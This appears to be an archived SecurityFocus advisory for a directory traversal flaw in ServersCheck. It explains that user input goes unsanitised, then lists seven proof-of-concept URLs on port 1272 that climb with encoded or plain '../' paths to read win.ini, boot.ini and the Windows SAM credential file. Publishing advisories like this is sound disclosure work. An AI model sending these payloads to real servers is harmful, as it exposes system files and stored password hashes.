13 lines
No EOL
897 B
Text
13 lines
No EOL
897 B
Text
source: https://www.securityfocus.com/bid/13810/info
|
|
|
|
ServersCheck is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
|
|
|
|
An attacker may leverage this issue to disclose arbitrary files on an affected computer in the context of the affected application. This may aid in further attacks against the underlying system.
|
|
|
|
http://www.example.com:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
|
|
http://www.example.com:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
|
|
http://www.example.com:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
|
|
http://www.example.com:1272/.../.../.../.../.../.../.../.../.../boot.ini
|
|
http://www.example.com:1272/../../ ../../../../../../../boot.ini
|
|
http://www.example.com:1272/../../../../../../../../boot.ini
|
|
http://www.example.com:1272/../../../../boot.ini |